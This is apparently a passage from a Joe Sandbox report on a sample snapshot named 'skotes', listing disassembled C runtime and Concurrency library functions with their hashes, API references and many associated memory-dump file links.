Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
API String ID: 348560076-465693683
Opcode ID: 632fe1dbccc23f91fce8696df6c87d31a0c162e9a0ab891087c740ec281fcd91
Instruction ID: c4bb18f288e5fb83ff90974f4fad40a5b5308c266e86624482432e562d371803
Opcode Fuzzy Hash: 632fe1dbccc23f91fce8696df6c87d31a0c162e9a0ab891087c740ec281fcd91
Instruction Fuzzy Hash: E201B9296523112D9B14B7BA5C8AFAF26DCD942714730183FB905E6293FDADD804437C

Function 004A2097 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

StructuredWorkStealingQueue.LIBCMT ref: 004A20B7

Part of subcall function 0049CAF3: Mailbox.LIBCMT ref: 0049CB2D

Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004A20C8
StructuredWorkStealingQueue.LIBCMT ref: 004A20FE
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004A210F

Strings

e, xrefs: 004A20D9

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured$Mailbox
String ID: e
API String ID: 1411586358-4024072794
Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction ID: d682d26038fd0b660f8e1ca0a0740bd2f027bc404254aad9270c6cdb5a3bd6ab
Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction Fuzzy Hash: ED11C131104144ABDB01DE6DCA816AB77A4AF27328B14806BFD068F202DBB9D901EB99

Function 0048D029 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 59COMMON

Download Yara Rule

APIs

___scrt_fastfail.LIBCMT ref: 0048D0A5

Strings

WakeAllConditionVariable, xrefs: 0048D069
SleepConditionVariableCS, xrefs: 0048D05D
api-ms-win-core-synch-l1-2-0.dll, xrefs: 0048D03B
kernel32.dll, xrefs: 0048D04C

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: ___scrt_fastfail
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2964418898-3242537097
Opcode ID: a25aefea2423b1c6343bf9393392758c5e872dca477448f237da754cb20222fc
Instruction ID: a16951e97c6ffdaa623b45dcc9633bc3ab3451268bb934b1a2d108b9dcecdf80
Opcode Fuzzy Hash: a25aefea2423b1c6343bf9393392758c5e872dca477448f237da754cb20222fc
Instruction Fuzzy Hash: BB018425BC37316A9630367A5D0DFAF13C98B43B44F65182BAC09E22D0DDA8C801966D

Function 0049E8DD Relevance: 7.6, APIs: 5, Instructions: 117COMMON

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 0049E91E
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0049E926
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0049E950
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0049E959
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0049E9DC

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Context$Base::$GroupScheduleSegment$AssignAvailableConcurrency::location::_EventInternalMakeProcessor::ReleaseRunnableTraceVirtual
String ID:
API String ID: 512098550-0
Opcode ID: 2cb71caab1c43d20884abd66ef226fb8451c41295cc4d48adfe0a28a426d1591
Instruction ID: 875cc25e76d5ee6e2288a375b3e1b70dbb7c69e2cd8128a99367e0350a50f682
Opcode Fuzzy Hash: 2cb71caab1c43d20884abd66ef226fb8451c41295cc4d48adfe0a28a426d1591
Instruction Fuzzy Hash: E4416175A00619EFCF09DF65C454A6DBBB6FF48314F04816AE906A7391CB78AE01CF85

Function 0049D2B9 Relevance: 7.6, APIs: 5, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 0049D344
ListArray.LIBCONCRT ref: 0049D367
Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0049D370
ListArray.LIBCONCRT ref: 0049D3A8
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0049D3B3

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$ArrayListVirtual$ActiveAvailableBase::CountedInterlockedMakeProcessorProcessor::QuickReferenceSchedulerSet::
String ID:
API String ID: 4212520697-0
Opcode ID: d94a19646f49a7e885198ce3e867d4cc47f2b8abfd3dd0308b3f54bf4c57c9e5
Instruction ID: df0199be9de7e34c20fe84c505f72b7033c5dd627ec46a44e419143b9f1182c6
Opcode Fuzzy Hash: d94a19646f49a7e885198ce3e867d4cc47f2b8abfd3dd0308b3f54bf4c57c9e5
Instruction Fuzzy Hash: 9331A375B00210DFCF15DF55C485FAEBBA5AF88304F1441AAE8069B392CB78AD41CB96

Function 004986C9 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 004986EE

Part of subcall function 0048EAD0: _SpinWait.LIBCONCRT ref: 0048EAE8

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 00498702
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00498734
List.LIBCMT ref: 004987B7
List.LIBCMT ref: 004987C6

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
